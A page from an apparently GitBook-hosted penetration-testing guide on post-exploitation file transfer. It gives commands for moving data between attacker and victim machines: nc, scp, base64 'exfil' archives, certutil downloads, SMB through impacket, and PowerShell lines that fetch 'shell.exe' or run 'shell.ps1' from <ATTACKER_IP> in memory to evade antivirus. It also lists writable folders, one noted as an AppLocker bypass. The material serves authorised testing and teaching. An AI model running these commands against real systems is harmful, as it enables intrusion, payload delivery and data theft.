The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • â„šī¸0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • đŸ•ĩī¸HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • đŸ’Ŗ2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • đŸŽŖGophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • đŸ‘ŋ3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • Linux
  • Folders with write permissions
  • nc
  • scp
  • base64
  • Windows
  • Folders with write permissions
  • Certutil
  • Powershell
  • SMB

File transfer

Introduction

During a pentesting, you will find interesting files that you may want to download for later analysis, or even you may want to upload your tools for performing attacks. However, you will not always have the means to transfer files on a restricted computer. Hence, in this section, you will see several methods to transfer files depending on the victim's OS.

Linux

Folders with write permissions

If you do not have write permissions to upload files on the victim's system, there are always some directories that allow everyone to write files on them:

/tmp/
/dev/shm/

nc

# Listening for the file to be transfered
nc -nlvp 4444 > file 
# Transfer the file
nc -w 3 <DST_IP> 4444 < file 

scp

# Download a file
scp [-r] <USER>@<IP>:<SRC_PATH> <DST_PATH> 
# Upload a file
scp <SRC_PATH>  <USER>@<IP>:<DST_PATH> 

base64

Compress the file for a smaller base64 output. Then, base64 the compressed file and copy the output on your clipboard.

zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt

Paste the output into a file and decode the file. Finally, uncompress the file.

base64 -d exfil.txt > exfil.zip
unzip exfil.zip

Windows

Folders with write permissions

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\ # Allow bypass AppLocker 
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public

Certutil

With certutil, you can download files into the victim's machine. Nonetheless, take into account that the downloaded file will be analyzed by installed AVs.

certutil.exe -split -urlcache -f http://<IP>/file.exe f.ex

Powershell

With PowerShell, you can download files.

powershell.exe Invoke-WebRequest -Uri "http://<ATTACKER_IP>/shell.exe" -OutFile notashell.exe

For Powershell scripts, instead of downloading them on the disk you can store them on memory bypassing some AVs.

powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/shell.ps1')"

SMB

#Kali
smbserver.py -smb2support  a . -username guest -password password
#Victim
net use \\<YOUR_IP>\a password /USER:guest
copy <VICTIM_FILE> \\<YOUR_IP>\a\

Last updated 1 year ago

With the use of you can create your own SMB server to upload and download files from the victim's computer.

impacket